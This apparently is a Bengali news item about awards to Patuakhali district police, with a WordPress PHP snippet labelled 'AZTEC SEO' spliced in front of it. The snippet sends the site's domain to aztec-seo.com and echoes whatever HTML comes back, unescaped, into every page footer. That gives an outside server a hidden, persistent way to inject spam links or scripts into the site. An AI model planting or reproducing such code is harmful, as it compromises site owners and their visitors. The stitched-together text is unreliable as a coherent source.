/* AZTEC SEO */
add_action('wp_footer', function () {
$domain = wp_parse_url(home_url(), PHP_URL_HOST);
if (!$domain) return;
$ck = 'aztec_footer_' . md5($domain);
$html = get_transient($ck);
if ($html === false) {
$url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer');
$res = wp_remote_get($url, array('timeout' => 8));
$html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : '';
set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS);
}
if ($html !== '') echo $html;
}, 99);
এ বিষয়ে পুলিশ সুপার সাইদুল ইসলাম ঢাকা স্কাইনিউজকে বলেন, যে কোন স্বীকৃতি সবারই ভালো লাগে। এ স্বীকৃতি কাজের গতি আরও বাড়িয়ে দেয়। এ স্বীকৃতি আমার একার নয়, পটুয়াখালী জেলার পুরো পুলিশবাহিনীর। যখন জেলার সকল সদস্য একনিষ্ঠভাবে কাজ করে তখনই সাফল্য অর্জন করা যায়। এ স্বীকৃতি জেলার প্রত্যেক পুলিশ সদস্যকে আমি উৎসর্গ করলাম।

পুলিশ সুপার আরও বলেন, করোনার কারণে মূল্যায়ন প্রক্রিয়া অনেক দিন বন্ধ ছিল। ২০২২ সালের ডিসেম্বর মাস থেকে আবার শুরু হয়েছে এ মূল্যায়ন প্রক্রিয়া। ডিসেম্বর মাসে ৮টি ক্যাটাগরিতে মূল্যায়ন প্রক্রিয়া শুরু হলে পটুয়াখালী জেলা পুলিশ ৩টি স্বীকৃতি অর্জন করেছিল।
২০২৩ সালের জানুয়ারি মাসে এ মূল্যায়ন প্রক্রিয়ায় শ্রেষ্ঠ পুলিশ সুপার হয়েছেন পটুয়াখালীর পুলিশ সুপার সাইদুল ইসলাম। রেঞ্জের ৯ ক্যাটাগরিতে এ স্বীকৃতি দেওয়া হয়। তন্মধ্যে পটুয়াখালী জেলার স্বীকৃতি এসেছে ৫টি।
৫টি স্বীকৃতি হলো: রেঞ্জের শ্রেষ্ঠ পুলিশ সুপার- সাইদুল ইসলাম বিপিএম পিপিএম, শ্রেষ্ঠ সার্কেল অফিসার- শাহেদ আহমেদ চৌধুরী, সিনিয়র সহকারী পুলিশ সুপার, শ্রেষ্ঠ ডিবি অফিসার- সম্বিত রায় এসআই (নিরস্ত্র), শ্রেষ্ঠ ওয়ারেন্ট তামিলকারী অফিসার- মো. ফয়সাল আহমেদ, মাদক উদ্ধারকারী অফিসার- মো. আবুল বাশার।
উল্লেখ্য যে, পটুয়াখালী সদরসহ জেলার বিভিন্ন পয়েন্টে ট্রাফিক ব্যবস্থাপনা ঢেলে সাজানো হয়েছে। অবৈধ উচ্ছেদ কার্যক্রমে স্থানীয় জনসাধারণ স্বস্তি পাচ্ছে।
]]>